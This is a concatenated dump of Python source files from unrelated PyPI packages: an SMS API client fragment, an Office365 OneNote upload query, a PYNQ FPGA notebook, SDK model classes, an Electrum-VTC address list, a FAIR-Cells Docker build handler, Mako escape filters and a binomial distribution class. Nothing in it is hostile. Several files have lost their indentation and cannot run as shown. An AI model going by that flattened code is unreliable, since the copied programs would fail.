if _NUMBER_FORMAT_REGEX.match(number):
return True
return False
def _check_sender(self, sender):
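        # Assumption: alphanumeric SMS senders are limited to 11 ASCII
        # characters (GSM standard); anything else must be a valid phone number.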
try:
sender.encode('ascii')
if self.is_valid_number(sender) or len(sender) <= 11:
return True
return False
except UnicodeEncodeError:
return False
    def _check_type(self, sms_type):
        # Return True for a valid type instead of setting default_type as a
        # side effect, so 'if self._check_type(...)' in callers works as intended.
        if sms_type in [CLASSIC, SMART, SMARTPRO]:
            return True
        raise exceptions.ComilioException('Invalid message type')
def _check_recipients(self, recipients, ignore_invalid=False):
if not isinstance(recipients, list):
recipients = [recipients]
        # Build new lists rather than removing from 'recipients' while
        # iterating over it, which would silently skip elements.
        valid = []
        invalid = []
        for recipient in recipients:
            if self.is_valid_number(recipient):
                valid.append(recipient)
            else:
                invalid.append(recipient)
        if invalid:
            if not ignore_invalid:
                exc = exceptions.ComilioException('Some (%d) recipients were invalid' % len(invalid))
                exc.payload = invalid
                raise exc
        return valid, invalid
def get(self, url):
return self._send_request(url, None, 'get')
def post(self, url, data):
return self._send_request(url, data, 'post')
def _send_request(self, url, data, method):
headers = {
'Content-Type': 'application/json',
}
method = getattr(requests, method)
target_url = API_URL + url
req = method(target_url, json=data, auth=self._auth, headers=headers)
if req.status_code == 401:
raise exceptions.InvalidCredentials
if self.raise_insufficient_credit:
try:
data = req.json()
if data['error'] == 'Insufficient+credit':
raise exceptions.InsufficientCredit
            except (ValueError, KeyError):
                pass
return req | PypiClean |
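# Minimal usage sketch (credentials, number and the response key are
# placeholders -- consult the Comilio API docs for the actual response shape):
# client = Client('username', 'password')
# client.set_default_sender('MyCompany')
# result = client.send('Hello!', recipients=['+393331234567'], type=SMART)
# print(client.status(result.get('message_id')))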
/Office365-REST-Python-Client-2.4.3.tar.gz/Office365-REST-Python-Client-2.4.3/office365/onenote/internal/multipart_page_query.py | from email.message import Message
from office365.runtime.compat import get_mime_type, message_as_bytes_or_string
from office365.runtime.http.http_method import HttpMethod
from office365.runtime.queries.batch import create_boundary
from office365.runtime.queries.client_query import ClientQuery
def _message_to_payload(message):
"""
:type message: Message
"""
lf = b"\n"
crlf = b"\r\n"
payload = message_as_bytes_or_string(message)
lines = payload.split(lf)
payload = bytes.join(crlf, lines[2:]) + crlf
return payload
class OneNotePageCreateQuery(ClientQuery):
def __init__(self, pages, presentation_file, attachment_files=None):
"""
:type pages: office365.onenote.pages.collection.OnenotePageCollection
:type presentation_file: typing.IO
:type attachment_files: dict or None
"""
super(OneNotePageCreateQuery, self).__init__(pages.context, pages)
pages.context.before_execute(self._construct_multipart_request)
self._presentation = presentation_file
if attachment_files is None:
attachment_files = {}
self._files = attachment_files
def _construct_multipart_request(self, request):
"""
:type request: office365.runtime.http.request_options.RequestOptions
"""
request.method = HttpMethod.Post
boundary = create_boundary("PageBoundary", True)
request.set_header("Content-Type", "multipart/form-data; boundary={0}".format(boundary))
main_message = Message()
main_message.add_header("Content-Type", "multipart/form-data; boundary={0}".format(boundary))
main_message.set_boundary(boundary)
c_type, enc = get_mime_type(self._presentation.name)
presentation_message = Message()
presentation_message.add_header("Content-Type", c_type)
presentation_message.add_header("Content-Disposition", "form-data; name=\"Presentation\"")
presentation_message.set_payload(self._presentation.read())
main_message.attach(presentation_message)
for name, file in self._files.items():
file_message = Message()
c_type, enc = get_mime_type(file.name)
file_message.add_header("Content-Type", c_type)
file_message.add_header("Content-Disposition", "form-data; name=\"{0}\"".format(name))
file_content = file.read()
file_message.set_payload(file_content)
main_message.attach(file_message)
request.data = _message_to_payload(main_message)
@property
def return_type(self):
if self._return_type is None:
from office365.onenote.pages.page import OnenotePage
self._return_type = OnenotePage(self.context)
self.binding_type.add_child(self._return_type)
return self._return_type | PypiClean |
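# Rough usage sketch (the client entry point shown here is an assumption, not
# confirmed -- page creation is normally triggered through a pages collection):
# with open("presentation.html", "rb") as presentation:
#     query = OneNotePageCreateQuery(client.me.onenote.pages, presentation)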
/Lab_3_Part1-0.0.1-py3-none-any.whl/Lab3-Part1/smul.ipynb | ```
import numpy as np
from pynq import Overlay
import pynq.lib.dma
from pynq import Xlnk
from pynq import MMIO
import time
import random
ol = Overlay('/home/xilinx/jupyter_notebooks/smul/smul.bit') # check your path
ol.download() # it downloads your bit to FPGA
dma = ol.streamMul.smul_dma # creating a dma instance. Note that we packed smul and smul_dma into streamMul
# smul_ip = MMIO(0x43c00000, 0x10000) # we got this address from the Address Editor
smul_ip = ol.streamMul.smul.mmio # MMIO handle for the smul IP's control registers
xlnk = Xlnk()
length = 11
in_buffer = xlnk.cma_array(shape=(length,), dtype=np.int32) # input buffer
out_buffer = xlnk.cma_array(shape=(length,), dtype=np.int32) # output buffer
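# The AXI DMA engine requires physically contiguous memory, hence the
# CMA-backed buffers from Xlnk rather than plain numpy arrays.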
samples = random.sample(range(0, length), length)
np.copyto(in_buffer, samples) # copy samples to input buffer
smul_ip.write(0x10, length) # we got this address from Vivado source
t_start = time.time()
dma.sendchannel.transfer(in_buffer)
dma.recvchannel.transfer(out_buffer)
dma.sendchannel.wait() # wait for send channel
dma.recvchannel.wait() # wait for recv channel
t_stop = time.time()
print('Hardware execution time: ', t_stop-t_start)
for i in range(0, length):
    print('{}*2 = {}'.format(in_buffer[i], out_buffer[i]))
# Free the contiguous buffers only after the results have been read back
in_buffer.close()
out_buffer.close()
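# For comparison, a software-only baseline (illustrative):
# t0 = time.time(); sw_out = [x * 2 for x in samples]; t1 = time.time()
# print('Software execution time: ', t1 - t0)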
ol.ip_dict
ol.streamMul.smul  # inspect the smul IP core object
```
| PypiClean |
/EnergyCapSdk-8.2304.4743.tar.gz/EnergyCapSdk-8.2304.4743/energycap/sdk/models/udf_field_child_py3.py |
from msrest.serialization import Model
class UDFFieldChild(Model):
"""UDFFieldChild.
:param udf_id: <span class='property-internal'>Required (defined)</span>
:type udf_id: int
:param data_type:
:type data_type: ~energycap.sdk.models.DataTypeResponse
:param name: <span class='property-internal'>Required (defined)</span>
:type name: str
:param description: <span class='property-internal'>Required
(defined)</span>
:type description: str
:param display_order: <span class='property-internal'>Required
(defined)</span>
:type display_order: int
:param value: <span class='property-internal'>Required (defined)</span>
:type value: str
:param udf_select_values: <span class='property-internal'>Required
(defined)</span>
:type udf_select_values:
list[~energycap.sdk.models.UDFSelectValueEntityResponse]
:param important: <span class='property-internal'>Required
(defined)</span>
:type important: bool
"""
_attribute_map = {
'udf_id': {'key': 'udfId', 'type': 'int'},
'data_type': {'key': 'dataType', 'type': 'DataTypeResponse'},
'name': {'key': 'name', 'type': 'str'},
'description': {'key': 'description', 'type': 'str'},
'display_order': {'key': 'displayOrder', 'type': 'int'},
'value': {'key': 'value', 'type': 'str'},
'udf_select_values': {'key': 'udfSelectValues', 'type': '[UDFSelectValueEntityResponse]'},
'important': {'key': 'important', 'type': 'bool'},
}
def __init__(self, *, udf_id: int=None, data_type=None, name: str=None, description: str=None, display_order: int=None, value: str=None, udf_select_values=None, important: bool=None, **kwargs) -> None:
super(UDFFieldChild, self).__init__(**kwargs)
self.udf_id = udf_id
self.data_type = data_type
self.name = name
self.description = description
self.display_order = display_order
self.value = value
self.udf_select_values = udf_select_values
self.important = important | PypiClean |
/Electrum-VTC-2.9.3.3.tar.gz/Electrum-VTC-2.9.3.3/gui/vtc/address_list.py |
import webbrowser
from util import *
from electrum_vtc.i18n import _
from electrum_vtc.util import block_explorer_URL, format_satoshis, format_time
from electrum_vtc.plugins import run_hook
from electrum_vtc.bitcoin import is_address
class AddressList(MyTreeWidget):
filter_columns = [0, 1, 2] # Address, Label, Balance
def __init__(self, parent=None):
MyTreeWidget.__init__(self, parent, self.create_menu, [ _('Address'), _('Label'), _('Balance'), _('Tx')], 1)
self.setSelectionMode(QAbstractItemView.ExtendedSelection)
def on_update(self):
self.wallet = self.parent.wallet
item = self.currentItem()
current_address = item.data(0, Qt.UserRole).toString() if item else None
self.clear()
receiving_addresses = self.wallet.get_receiving_addresses()
change_addresses = self.wallet.get_change_addresses()
if True:
account_item = self
sequences = [0,1] if change_addresses else [0]
for is_change in sequences:
if len(sequences) > 1:
name = _("Receiving") if not is_change else _("Change")
seq_item = QTreeWidgetItem( [ name, '', '', '', ''] )
account_item.addChild(seq_item)
if not is_change:
seq_item.setExpanded(True)
else:
seq_item = account_item
used_item = QTreeWidgetItem( [ _("Used"), '', '', '', ''] )
used_flag = False
addr_list = change_addresses if is_change else receiving_addresses
for address in addr_list:
num = len(self.wallet.history.get(address,[]))
is_used = self.wallet.is_used(address)
label = self.wallet.labels.get(address,'')
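                    # confirmed, unconfirmed and unmatured balance components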
c, u, x = self.wallet.get_addr_balance(address)
balance = self.parent.format_amount(c + u + x)
address_item = QTreeWidgetItem([address, label, balance, "%d"%num])
address_item.setFont(0, QFont(MONOSPACE_FONT))
address_item.setData(0, Qt.UserRole, address)
address_item.setData(0, Qt.UserRole+1, True) # label can be edited
if self.wallet.is_frozen(address):
address_item.setBackgroundColor(0, QColor('lightblue'))
if self.wallet.is_beyond_limit(address, is_change):
address_item.setBackgroundColor(0, QColor('red'))
if is_used:
if not used_flag:
seq_item.insertChild(0, used_item)
used_flag = True
used_item.addChild(address_item)
else:
seq_item.addChild(address_item)
if address == current_address:
self.setCurrentItem(address_item)
def create_menu(self, position):
from electrum_vtc.wallet import Multisig_Wallet
is_multisig = isinstance(self.wallet, Multisig_Wallet)
can_delete = self.wallet.can_delete_address()
selected = self.selectedItems()
multi_select = len(selected) > 1
addrs = [unicode(item.text(0)) for item in selected]
if not addrs:
return
if not multi_select:
item = self.itemAt(position)
col = self.currentColumn()
if not item:
return
addr = addrs[0]
if not is_address(addr):
item.setExpanded(not item.isExpanded())
return
menu = QMenu()
if not multi_select:
column_title = self.headerItem().text(col)
menu.addAction(_("Copy %s")%column_title, lambda: self.parent.app.clipboard().setText(item.text(col)))
menu.addAction(_('Details'), lambda: self.parent.show_address(addr))
if col in self.editable_columns:
menu.addAction(_("Edit %s")%column_title, lambda: self.editItem(item, col))
menu.addAction(_("Request payment"), lambda: self.parent.receive_at(addr))
if self.wallet.can_export():
menu.addAction(_("Private key"), lambda: self.parent.show_private_key(addr))
if not is_multisig and not self.wallet.is_watching_only():
menu.addAction(_("Sign/verify message"), lambda: self.parent.sign_verify_message(addr))
menu.addAction(_("Encrypt/decrypt message"), lambda: self.parent.encrypt_message(addr))
if can_delete:
menu.addAction(_("Remove from wallet"), lambda: self.parent.remove_address(addr))
addr_URL = block_explorer_URL(self.config, 'addr', addr)
if addr_URL:
menu.addAction(_("View on block explorer"), lambda: webbrowser.open(addr_URL))
if not self.wallet.is_frozen(addr):
menu.addAction(_("Freeze"), lambda: self.parent.set_frozen_state([addr], True))
else:
menu.addAction(_("Unfreeze"), lambda: self.parent.set_frozen_state([addr], False))
coins = self.wallet.get_utxos(addrs)
if coins:
menu.addAction(_("Spend from"), lambda: self.parent.spend_coins(coins))
run_hook('receive_menu', menu, addrs, self.wallet)
menu.exec_(self.viewport().mapToGlobal(position)) | PypiClean |
/FAIR-Cells-1.0.20.tar.gz/FAIR-Cells-1.0.20/fair-cells/backend/handlers/build_handler.py | import json
import os
import tempfile
import shutil
import importlib
import yaml
from typing import Optional
import docker
from notebook.base.handlers import IPythonHandler, APIHandler, HTTPError
from notebook.utils import url_path_join
from pigar.core import parse_packages
from ..container.docker_service import DockerService
from .base_handler import BaseHandler
from .environment_handler import BASE_STRING
import logging
logger = logging.getLogger('BuildHandler')
logger.setLevel(logging.DEBUG)
# create console handler and set level to debug
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
# create formatter
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
# add formatter to ch
ch.setFormatter(formatter)
# add ch to logger
logger.addHandler(ch)
def create_config(notebook_path, cell_index, variables):
return json.dumps({
'path': notebook_path,
'index': cell_index,
'variables': variables
})
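# Example (illustrative values):
# create_config("notebook.ipynb", 2, {"alpha": "1"})
# -> '{"path": "notebook.ipynb", "index": 2, "variables": {"alpha": "1"}}'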
class BuildHandler(BaseHandler):
def post(self, path):
notebook = self.contents_manager.get(path, content=True)
notebook_path = os.path.join(os.getcwd(), path)
notebook_name = "notebook.ipynb"
body = self.get_json_body()
image_name = body.get('imageName')
base_image = body.get('baseImage')
cell_index = int(body.get('cellIndex'))
variables = body.get('variables', {})
logging.info("image_name: " + str(image_name))
logging.info("base_image: " + str(base_image))
logging.info("cell_index: " + str(cell_index))
logging.info("variables: " + str(variables))
        if image_name is None or base_image is None or cell_index is None:
            raise HTTPError(400, 'imageName, baseImage and cellIndex are required')
        cell_index = int(cell_index)
requirements = body.get('environment', BASE_STRING)
# Create a temporary dir which will be our build context.
with tempfile.TemporaryDirectory() as tmpdir:
shutil.copyfile(notebook_path, tmpdir + "/" + notebook_name)
# Find the location of the FAIR-Cells module on disk
# So it can copy & install it in the container.
dirname = os.path.dirname(__file__)
nested_levels = len(__name__.split('.')) - 2
module_path = os.path.join(dirname + '/..' * nested_levels)
# Copy helper to build context.
shutil.copytree(module_path,
tmpdir + "/fair-cells/",
ignore=shutil.ignore_patterns('.ipynb_checkpoints', '__pycache__'))
with open(tmpdir + "/environment.yml", "a") as reqs:
reqs.write(requirements)
with open(tmpdir + "/environment.yml") as file:
environment = yaml.load(file, Loader=yaml.FullLoader)
lines = ''
for requ in environment['dependencies'][0]['pip']:
lines += requ + '\n'
            with open(tmpdir + '/requirements.txt', 'w') as f:
                f.write(lines)
with open(tmpdir + "/nb_helper_config.json", "a") as cfg:
config = create_config(notebook_name, cell_index, variables)
cfg.write(config)
with open(tmpdir + "/.dockerignore", "a") as ignore:
ignore.write("**/backend\n")
ignore.write("**/frontend\n")
logging.info("image_name: " + str(image_name))
cc = DockerService()
try:
logging.info("Start building container")
_, log = cc.build_container(cc.get_dockerfile(base_image),tmpdir,image_name)
logging.info("Finish building container")
except docker.errors.BuildError as be:
logger.error(str(be))
logger.error(str(be.build_log))
log = be.build_log
logs = "".join([l['stream'] if 'stream' in l else '' for l in log])
self.finish(json.dumps({
'logs': logs
            }))
/Apiamtic_python-1.6.9-py3-none-any.whl/verizon5gmecvnspapi/models/workload.py

from verizon5gmecvnspapi.api_helper import APIHelper
from verizon5gmecvnspapi.models.repository import Repository
from verizon5gmecvnspapi.models.service_onboarding_helm_git_branch import ServiceOnboardingHelmGitBranch
from verizon5gmecvnspapi.models.service_onboarding_helm_git_tag import ServiceOnboardingHelmGitTag
from verizon5gmecvnspapi.models.service_onboarding_helm_helmrepo import ServiceOnboardingHelmHelmrepo
from verizon5gmecvnspapi.models.service_onboarding_helm_yaml_git_tag import ServiceOnboardingHelmYamlGitTag
from verizon5gmecvnspapi.models.service_onboarding_terraform_git_branch import ServiceOnboardingTerraformGitBranch
from verizon5gmecvnspapi.models.service_onboarding_terraform_git_tag import ServiceOnboardingTerraformGitTag
from verizon5gmecvnspapi.models.service_onboarding_yaml_git_branch import ServiceOnboardingYamlGitBranch
class Workload(object):
"""Implementation of the 'Workload' model.
Workload attribute of a service.
Attributes:
id (string): The auto-generated Id of the workload.
name (string): Name of the workload needs to be deployed.
description (string): A brief workload description.
package_type (ServiceDependencyPackageTypeEnum): Deployment package
type.
upload_type (UploadTypeEnum): Allowed values are: GIT files
(PULL_FROM_REPO), MANUAL_UPLOAD.
repository_type (WorkloadRepositoryTypeEnum): Repository types
allowed: GIT/HELM.
repository_id (string): In case of 'Pull files from my repository',
The user can provide the existing repositoryID.
repository (Repository): Users can create a repository to maintain
service artifacts. Repository would be either a Git or HELM
repository.
files (list of string): Files which are being generated.
revision_type (WorkloadRevisionTypeEnum): Revision type can be a
BRANCH or TAG.
helm_git_branch (ServiceOnboardingHelmGitBranch): TODO: type
description here.
helm_git_tag (ServiceOnboardingHelmGitTag): TODO: type description
here.
helm_yaml_git_tag (ServiceOnboardingHelmYamlGitTag): TODO: type
description here.
helm_helmrepo (ServiceOnboardingHelmHelmrepo): TODO: type description
here.
yaml_git_branch (ServiceOnboardingYamlGitBranch): TODO: type
description here.
terraform_git_branch (ServiceOnboardingTerraformGitBranch): TODO: type
description here.
terraform_git_tag (ServiceOnboardingTerraformGitTag): TODO: type
description here.
created_date (datetime): The date on which the workload is created.
last_modified_dte (datetime): The date when the created workload was
last modified.
created_by (string): Identity of the user who created the workload.
updated_by (string): Identity of the user who updated the workload.
"""
# Create a mapping from Model property names to API property names
_names = {
"name": 'name',
"id": 'id',
"description": 'description',
"package_type": 'packageType',
"upload_type": 'uploadType',
"repository_type": 'repositoryType',
"repository_id": 'repositoryId',
"repository": 'repository',
"files": 'files',
"revision_type": 'revisionType',
"helm_git_branch": 'helmGitBranch',
"helm_git_tag": 'helmGitTag',
"helm_yaml_git_tag": 'helmYamlGitTag',
"helm_helmrepo": 'helmHelmrepo',
"yaml_git_branch": 'yamlGitBranch',
"terraform_git_branch": 'terraformGitBranch',
"terraform_git_tag": 'terraformGitTag',
"created_date": 'createdDate',
"last_modified_dte": 'lastModifiedDte',
"created_by": 'createdBy',
"updated_by": 'updatedBy'
}
_optionals = [
'id',
'description',
'package_type',
'upload_type',
'repository_type',
'repository_id',
'repository',
'files',
'revision_type',
'helm_git_branch',
'helm_git_tag',
'helm_yaml_git_tag',
'helm_helmrepo',
'yaml_git_branch',
'terraform_git_branch',
'terraform_git_tag',
'created_date',
'last_modified_dte',
'created_by',
'updated_by',
]
_nullables = [
'description',
'package_type',
'repository_type',
'repository_id',
'files',
]
def __init__(self,
name=None,
id=APIHelper.SKIP,
description=APIHelper.SKIP,
package_type=APIHelper.SKIP,
upload_type=APIHelper.SKIP,
repository_type=APIHelper.SKIP,
repository_id=APIHelper.SKIP,
repository=APIHelper.SKIP,
files=APIHelper.SKIP,
revision_type=APIHelper.SKIP,
helm_git_branch=APIHelper.SKIP,
helm_git_tag=APIHelper.SKIP,
helm_yaml_git_tag=APIHelper.SKIP,
helm_helmrepo=APIHelper.SKIP,
yaml_git_branch=APIHelper.SKIP,
terraform_git_branch=APIHelper.SKIP,
terraform_git_tag=APIHelper.SKIP,
created_date=APIHelper.SKIP,
last_modified_dte=APIHelper.SKIP,
created_by=APIHelper.SKIP,
updated_by=APIHelper.SKIP):
"""Constructor for the Workload class"""
# Initialize members of the class
if id is not APIHelper.SKIP:
self.id = id
self.name = name
if description is not APIHelper.SKIP:
self.description = description
if package_type is not APIHelper.SKIP:
self.package_type = package_type
if upload_type is not APIHelper.SKIP:
self.upload_type = upload_type
if repository_type is not APIHelper.SKIP:
self.repository_type = repository_type
if repository_id is not APIHelper.SKIP:
self.repository_id = repository_id
if repository is not APIHelper.SKIP:
self.repository = repository
if files is not APIHelper.SKIP:
self.files = files
if revision_type is not APIHelper.SKIP:
self.revision_type = revision_type
if helm_git_branch is not APIHelper.SKIP:
self.helm_git_branch = helm_git_branch
if helm_git_tag is not APIHelper.SKIP:
self.helm_git_tag = helm_git_tag
if helm_yaml_git_tag is not APIHelper.SKIP:
self.helm_yaml_git_tag = helm_yaml_git_tag
if helm_helmrepo is not APIHelper.SKIP:
self.helm_helmrepo = helm_helmrepo
if yaml_git_branch is not APIHelper.SKIP:
self.yaml_git_branch = yaml_git_branch
if terraform_git_branch is not APIHelper.SKIP:
self.terraform_git_branch = terraform_git_branch
if terraform_git_tag is not APIHelper.SKIP:
self.terraform_git_tag = terraform_git_tag
if created_date is not APIHelper.SKIP:
self.created_date = APIHelper.RFC3339DateTime(created_date) if created_date else None
if last_modified_dte is not APIHelper.SKIP:
self.last_modified_dte = APIHelper.RFC3339DateTime(last_modified_dte) if last_modified_dte else None
if created_by is not APIHelper.SKIP:
self.created_by = created_by
if updated_by is not APIHelper.SKIP:
self.updated_by = updated_by
@classmethod
def from_dictionary(cls,
dictionary):
"""Creates an instance of this model from a dictionary
Args:
dictionary (dictionary): A dictionary representation of the object
as obtained from the deserialization of the server's response. The
keys MUST match property names in the API description.
Returns:
object: An instance of this structure class.
"""
if dictionary is None:
return None
# Extract variables from the dictionary
name = dictionary.get("name") if dictionary.get("name") else None
id = dictionary.get("id") if dictionary.get("id") else APIHelper.SKIP
description = dictionary.get("description") if "description" in dictionary.keys() else APIHelper.SKIP
package_type = dictionary.get("packageType") if "packageType" in dictionary.keys() else APIHelper.SKIP
upload_type = dictionary.get("uploadType") if dictionary.get("uploadType") else APIHelper.SKIP
repository_type = dictionary.get("repositoryType") if "repositoryType" in dictionary.keys() else APIHelper.SKIP
repository_id = dictionary.get("repositoryId") if "repositoryId" in dictionary.keys() else APIHelper.SKIP
repository = Repository.from_dictionary(dictionary.get('repository')) if 'repository' in dictionary.keys() else APIHelper.SKIP
files = dictionary.get("files") if "files" in dictionary.keys() else APIHelper.SKIP
revision_type = dictionary.get("revisionType") if dictionary.get("revisionType") else APIHelper.SKIP
helm_git_branch = ServiceOnboardingHelmGitBranch.from_dictionary(dictionary.get('helmGitBranch')) if 'helmGitBranch' in dictionary.keys() else APIHelper.SKIP
helm_git_tag = ServiceOnboardingHelmGitTag.from_dictionary(dictionary.get('helmGitTag')) if 'helmGitTag' in dictionary.keys() else APIHelper.SKIP
helm_yaml_git_tag = ServiceOnboardingHelmYamlGitTag.from_dictionary(dictionary.get('helmYamlGitTag')) if 'helmYamlGitTag' in dictionary.keys() else APIHelper.SKIP
helm_helmrepo = ServiceOnboardingHelmHelmrepo.from_dictionary(dictionary.get('helmHelmrepo')) if 'helmHelmrepo' in dictionary.keys() else APIHelper.SKIP
yaml_git_branch = ServiceOnboardingYamlGitBranch.from_dictionary(dictionary.get('yamlGitBranch')) if 'yamlGitBranch' in dictionary.keys() else APIHelper.SKIP
terraform_git_branch = ServiceOnboardingTerraformGitBranch.from_dictionary(dictionary.get('terraformGitBranch')) if 'terraformGitBranch' in dictionary.keys() else APIHelper.SKIP
terraform_git_tag = ServiceOnboardingTerraformGitTag.from_dictionary(dictionary.get('terraformGitTag')) if 'terraformGitTag' in dictionary.keys() else APIHelper.SKIP
created_date = APIHelper.RFC3339DateTime.from_value(dictionary.get("createdDate")).datetime if dictionary.get("createdDate") else APIHelper.SKIP
last_modified_dte = APIHelper.RFC3339DateTime.from_value(dictionary.get("lastModifiedDte")).datetime if dictionary.get("lastModifiedDte") else APIHelper.SKIP
created_by = dictionary.get("createdBy") if dictionary.get("createdBy") else APIHelper.SKIP
updated_by = dictionary.get("updatedBy") if dictionary.get("updatedBy") else APIHelper.SKIP
# Return an object of this model
return cls(name,
id,
description,
package_type,
upload_type,
repository_type,
repository_id,
repository,
files,
revision_type,
helm_git_branch,
helm_git_tag,
helm_yaml_git_tag,
helm_helmrepo,
yaml_git_branch,
terraform_git_branch,
terraform_git_tag,
created_date,
last_modified_dte,
created_by,
                   updated_by)
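

# Minimal usage sketch (illustrative; not part of the generated SDK). Keys in
# the payload must match the API property names in the _names map above.
if __name__ == "__main__":
    payload = {"name": "example-workload", "packageType": "HELM"}
    workload = Workload.from_dictionary(payload)
    # Optional fields that were absent from the payload stay unset (SKIP).
    print(workload.name, workload.package_type)  # example-workload HELM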
/Mako-1.2.4.tar.gz/Mako-1.2.4/mako/filters.py
import codecs
from html.entities import codepoint2name
from html.entities import name2codepoint
import re
from urllib.parse import quote_plus
import markupsafe
html_escape = markupsafe.escape
xml_escapes = {
"&": "&",
">": ">",
"<": "<",
'"': """, # also " in html-only
"'": "'", # also ' in html-only
}
def xml_escape(string):
return re.sub(r'([&<"\'>])', lambda m: xml_escapes[m.group()], string)
def url_escape(string):
# convert into a list of octets
string = string.encode("utf8")
return quote_plus(string)
def trim(string):
return string.strip()
class Decode:
def __getattr__(self, key):
def decode(x):
if isinstance(x, str):
return x
elif not isinstance(x, bytes):
return decode(str(x))
else:
return str(x, encoding=key)
return decode
decode = Decode()
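
# Illustrative: the attribute name selects the byte encoding, e.g.
#
#     decode.utf8(b"caf\xc3\xa9")    # -> "café"
#     decode.latin1(b"caf\xe9")      # -> "café"
#
# Non-bytes, non-str input is coerced with str() and returned unchanged.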
class XMLEntityEscaper:
def __init__(self, codepoint2name, name2codepoint):
self.codepoint2entity = {
c: str("&%s;" % n) for c, n in codepoint2name.items()
}
self.name2codepoint = name2codepoint
def escape_entities(self, text):
"""Replace characters with their character entity references.
Only characters corresponding to a named entity are replaced.
"""
return str(text).translate(self.codepoint2entity)
def __escape(self, m):
codepoint = ord(m.group())
try:
return self.codepoint2entity[codepoint]
except (KeyError, IndexError):
return "&#x%X;" % codepoint
__escapable = re.compile(r'["&<>]|[^\x00-\x7f]')
def escape(self, text):
"""Replace characters with their character references.
Replace characters by their named entity references.
Non-ASCII characters, if they do not have a named entity reference,
are replaced by numerical character references.
The return value is guaranteed to be ASCII.
"""
return self.__escapable.sub(self.__escape, str(text)).encode("ascii")
# XXX: This regexp will not match all valid XML entity names__.
    # (It punts on details involving CombiningChars and Extenders.)
#
# .. __: http://www.w3.org/TR/2000/REC-xml-20001006#NT-EntityRef
__characterrefs = re.compile(
r"""& (?:
\#(\d+)
| \#x([\da-f]+)
| ( (?!\d) [:\w] [-.:\w]+ )
) ;""",
re.X | re.UNICODE,
)
def __unescape(self, m):
dval, hval, name = m.groups()
if dval:
codepoint = int(dval)
elif hval:
codepoint = int(hval, 16)
else:
codepoint = self.name2codepoint.get(name, 0xFFFD)
# U+FFFD = "REPLACEMENT CHARACTER"
        return chr(codepoint)
def unescape(self, text):
"""Unescape character references.
All character references (both entity references and numerical
character references) are unescaped.
"""
return self.__characterrefs.sub(self.__unescape, text)
_html_entities_escaper = XMLEntityEscaper(codepoint2name, name2codepoint)
html_entities_escape = _html_entities_escaper.escape_entities
html_entities_unescape = _html_entities_escaper.unescape
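
# Illustrative round trip:
#
#     html_entities_escape("café")    # -> "café"
#     html_entities_unescape("café")  # -> "café"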
def htmlentityreplace_errors(ex):
"""An encoding error handler.
This python codecs error handler replaces unencodable
characters with HTML entities, or, if no HTML entity exists for
the character, XML character references::
>>> 'The cost was \u20ac12.'.encode('latin1', 'htmlentityreplace')
    b'The cost was €12.'
"""
if isinstance(ex, UnicodeEncodeError):
# Handle encoding errors
bad_text = ex.object[ex.start : ex.end]
text = _html_entities_escaper.escape(bad_text)
        # escape() returns ASCII bytes; decode so the codec re-encodes the
        # pure-ASCII replacement instead of str()-ing a bytes object
        return (text.decode("ascii"), ex.end)
raise ex
codecs.register_error("htmlentityreplace", htmlentityreplace_errors)
DEFAULT_ESCAPES = {
"x": "filters.xml_escape",
"h": "filters.html_escape",
"u": "filters.url_escape",
"trim": "filters.trim",
"entity": "filters.html_entities_escape",
"unicode": "str",
"decode": "decode",
"str": "str",
"n": "n",
}
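
# Illustrative note: these names back Mako's expression filter syntax, so
# ``${expr | h}`` resolves "h" to filters.html_escape, ``${expr | u}`` to
# filters.url_escape, and so on.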
/Gaussian_and_Binomial_sethhamilton94-0.1.tar.gz/Gaussian_and_Binomial_sethhamilton94/Binomialdistribution.py

import math
import matplotlib.pyplot as plt
from .Generaldistribution import Distribution
class Binomial(Distribution):
""" Binomial distribution class for calculating and
visualizing a Binomial distribution.
Attributes:
mean (float) representing the mean value of the distribution
stdev (float) representing the standard deviation of the distribution
data_list (list of floats) a list of floats to be extracted from the data file
p (float) representing the probability of an event occurring
n (int) number of trials
"""
def __init__(self, prob=.5, size=20):
self.n = size
self.p = prob
Distribution.__init__(self, self.calculate_mean(), self.calculate_stdev())
def calculate_mean(self):
"""Function to calculate the mean from p and n
Args:
None
Returns:
float: mean of the data set
"""
self.mean = self.p * self.n
return self.mean
def calculate_stdev(self):
"""Function to calculate the standard deviation from p and n.
Args:
None
Returns:
float: standard deviation of the data set
"""
self.stdev = math.sqrt(self.n * self.p * (1 - self.p))
return self.stdev
def replace_stats_with_data(self):
"""Function to calculate p and n from the data set
Args:
None
Returns:
float: the p value
float: the n value
"""
self.n = len(self.data)
self.p = 1.0 * sum(self.data) / len(self.data)
self.mean = self.calculate_mean()
self.stdev = self.calculate_stdev()
def plot_bar(self):
"""Function to output a histogram of the instance variable data using
matplotlib pyplot library.
Args:
None
Returns:
None
"""
plt.bar(x = ['0', '1'], height = [(1 - self.p) * self.n, self.p * self.n])
plt.title('Bar Chart of Data')
plt.xlabel('outcome')
plt.ylabel('count')
def pdf(self, k):
"""Probability density function calculator for the gaussian distribution.
Args:
x (float): point for calculating the probability density function
Returns:
float: probability density function output
"""
a = math.factorial(self.n) / (math.factorial(k) * (math.factorial(self.n - k)))
b = (self.p ** k) * (1 - self.p) ** (self.n - k)
return a * b
def plot_bar_pdf(self):
"""Function to plot the pdf of the binomial distribution
Args:
None
Returns:
list: x values for the pdf plot
list: y values for the pdf plot
"""
x = []
y = []
# calculate the x values to visualize
for i in range(self.n + 1):
x.append(i)
y.append(self.pdf(i))
# make the plots
plt.bar(x, y)
plt.title('Distribution of Outcomes')
plt.ylabel('Probability')
plt.xlabel('Outcome')
plt.show()
return x, y
def __add__(self, other):
"""Function to add together two Binomial distributions with equal p
Args:
other (Binomial): Binomial instance
Returns:
Binomial: Binomial distribution
"""
        assert self.p == other.p, 'p values are not equal'
result = Binomial()
result.n = self.n + other.n
result.p = self.p
result.calculate_mean()
result.calculate_stdev()
return result
def __repr__(self):
"""Function to output the characteristics of the Binomial instance
Args:
None
Returns:
            string: characteristics of the Binomial
"""
return "mean {}, standard deviation {}, p {}, n {}".\
        format(self.mean, self.stdev, self.p, self.n)
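

# Minimal usage sketch (illustrative):
if __name__ == "__main__":
    binomial = Binomial(prob=0.4, size=25)
    print(binomial.pdf(10))    # P(exactly 10 successes) ~= 0.1612
    combined = binomial + Binomial(prob=0.4, size=10)
    print(combined)            # mean 14.0, standard deviation ~2.898, p 0.4, n 35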
/NearPy-0.2.2.tar.gz/NearPy-0.2.2/nearpy/experiments/distanceratioexperiment.py
# Copyright (c) 2013 Ole Krause-Sparmann
